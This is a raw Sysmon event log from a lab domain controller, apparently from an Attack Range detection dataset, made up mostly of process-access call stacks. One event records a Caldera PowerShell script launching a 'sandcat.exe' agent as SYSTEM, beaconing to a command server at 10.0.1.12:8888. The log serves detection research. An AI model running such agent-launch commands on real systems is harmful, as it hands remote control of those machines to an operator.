12:01:00.299{266CAFBE-646C-6064-1000-00000000AE01}11242828C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2380C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\wer.dll+6e508|C:\Windows\System32\wer.dll+3776c|C:\Windows\System32\wer.dll+38a78|C:\Windows\System32\wer.dll+13ae4|C:\Windows\System32\wer.dll+51b6|c:\windows\system32\wuaueng.dll+d4e24|c:\windows\system32\wuaueng.dll+551f4|c:\windows\system32\wuaueng.dll+4e23b|c:\windows\system32\wuaueng.dll+4e48b|c:\windows\system32\wuaueng.dll+4e5ee|c:\windows\system32\wuaueng.dll+4fba0|c:\windows\system32\wuaueng.dll+5c1ef|c:\windows\system32\wuaueng.dll+4d1c5|c:\windows\system32\wuaueng.dll+4c7f5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:56.643{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:56.643{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.690{266CAFBE-646E-6064-1C00-00000000AE01}23042400C:\Windows\system32\conhost.exe{266CAFBE-6476-6064-2800-00000000AE01}2556C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.674{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6476-6064-2800-00000000AE01}2556C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.674{266CAFBE-646E-6064-1900-00000000AE01}22762904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6476-6064-2800-00000000AE01}2556C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6cd0fff4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c19347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c1930b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6cc5b3b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c15002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c1b3a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c195aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c195aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c19593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c18665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c193b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c193710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c19347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c1930b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6cc5b3b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c178363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+6c1778d5(wow64) 154100x80000000000000001588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.634{266CAFBE-6476-6064-2800-00000000AE01}2556C:\Users\Public\sandcat.exe-----"C:\Users\Public\sandcat.exe" -server http://10.0.1.12:8888 -group my_group -vC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=4AAC4143487A1888FC416C8D6AAA28BF,SHA256=A98ED4833C64FF96AD74F1A76358B1FB947C7BC61502E51624AFE6944982EC93,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_agent.ps1 10341000x80000000000000001587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 10341000x80000000000000001582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6476-6064-2700-00000000AE01}2448C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:54.455{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 